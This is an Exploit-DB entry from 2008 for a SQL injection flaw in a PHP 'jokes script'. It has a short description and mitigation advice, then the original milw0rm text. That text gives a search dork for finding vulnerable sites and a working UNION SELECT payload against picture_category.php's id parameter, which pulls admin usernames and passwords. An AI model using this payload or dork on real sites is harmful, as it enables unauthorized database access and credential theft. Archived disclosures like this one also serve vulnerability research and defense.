jokes script Remote SQL Injection Exploit

vendor:

jokes script

by:

sarbot511

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: jokes script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

jokes script Remote SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL queries into the vulnerable application. The vulnerable parameter is the 'id' parameter which is not properly sanitized before being used in a SQL query. By exploiting this vulnerability, an attacker can gain access to the application's database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.

Source

Exploit-DB raw data:

################## sarbot511 #########################################################
#
#
#              jokes script  Remote SQL Injection Exploit
#
#    Founded by : sarbot511 
#    Dork: "All Rights Reserved. Powered by DieselScripts.com" 
#
##### Vuln Code: ###################################################################
#
#
###### Exploit #####################################################################
#
#   http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
#
###### Greets #######################################################################
#
#  Dr.LiNuX  ,  ABO3TB  , ALM511  ,master , all my frinds
#
####################################################################################

# milw0rm.com [2008-09-18]